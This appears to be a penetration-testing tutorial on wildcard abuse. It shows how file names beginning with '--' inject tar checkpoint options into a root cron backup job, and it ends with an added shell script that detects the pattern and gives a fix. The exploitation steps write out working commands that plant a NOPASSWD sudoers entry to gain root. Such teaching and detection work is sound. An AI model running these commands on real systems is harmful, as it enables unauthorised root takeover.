Wildcard Abuse

| Character | Significance |
|-----------|--------------|
| `*` | An asterisk that can match any number of characters in a file name. |
| `?` | Matches a single character. |
| `[ ]` | Brackets enclose characters and can match any single one at the defined position. |
| `~` | A tilde at the beginning expands to the name of the user home directory or can have another username appended to refer to that user's home directory. |
| `-` | A hyphen within brackets will denote a range of characters. |

Sample Exploitation

  1. Assume there is a cron job like the following:

    # m h dom mon dow command
    */01 * * * * cd /root && tar -zcf /tmp/backup.tar.gz *
  2. Use these commands (similar to the ones on GTFOBins):

    $ echo 'echo "cliff.moore ALL=(root) NOPASSWD: ALL" >> /etc/sudoers' > root.sh
    $ echo "" > "--checkpoint-action=exec=sh root.sh"
    $ echo "" > --checkpoint=1
    $ ls -la
    
    total 56
    drwxrwxrwt 10 root        root        4096 Aug 31 23:12 .
    drwxr-xr-x 24 root        root        4096 Aug 31 02:24 ..
    -rw-r--r--  1 root        root         378 Aug 31 23:12 backup.tar.gz
    -rw-rw-r--  1 cliff.moore cliff.moore    1 Aug 31 23:11 --checkpoint=1
    -rw-rw-r--  1 cliff.moore cliff.moore    1 Aug 31 23:11 --checkpoint-action=exec=sh root.sh
    drwxrwxrwt  2 root        root        4096 Aug 31 22:36 .font-unix
    drwxrwxrwt  2 root        root        4096 Aug 31 22:36 .ICE-unix
    -rw-rw-r--  1 cliff.moore cliff.moore   60 Aug 31 23:11 root.sh
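  3. Once the cron job runs, the shell expands `*` to include the two file names that start with `--`, tar treats them as options and runs root.sh as root, and we gain root.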
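
A defensive check for the pattern above, as an added example that is not part of the original page: it lists option-like file names in a directory, shows how many arguments a bare `*` versus `./*` would hand to a command as options, and flags cron lines that pass a bare `*`. The function names are hypothetical, and the cron check assumes a five-field schedule.

```shell
#!/bin/sh
# Added example (not from the original page): audit for option-like file names
# and for cron commands that pass a bare * to a program.

# Print entries in directory $1 whose names start with '-'.
find_option_like_names() {
    ( cd "$1" || exit 1
      for f in ./-*; do
          if [ -e "$f" ]; then printf '%s\n' "${f#./}"; fi
      done )
}

# Count how many of the given arguments a program would see as options.
count_dash_args() {
    n=0
    for a in "$@"; do
        case $a in -*) n=$((n + 1)) ;; esac
    done
    echo "$n"
}

# What a command receives from a bare glob versus a ./ prefixed glob in $1.
bare_glob_dash_args()     { ( cd "$1" && count_dash_args * ); }
prefixed_glob_dash_args() { ( cd "$1" && count_dash_args ./* ); }

# Return 0 if a crontab line passes a bare * (not ./* and not after --)
# to its command. Assumes a five-field schedule; comment lines are skipped.
cron_uses_bare_glob() {
    printf '%s\n' "$1" | awk '
        /^[[:space:]]*#/ { exit 1 }
        { for (i = 6; i <= NF; i++)
              if ($i ~ /^\*/ && $(i - 1) != "--") found = 1 }
        END { exit(found ? 0 : 1) }'
}
```

Writing the cron command with `./*` (or placing `--` before `*`) means no expanded name can be parsed as an option.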
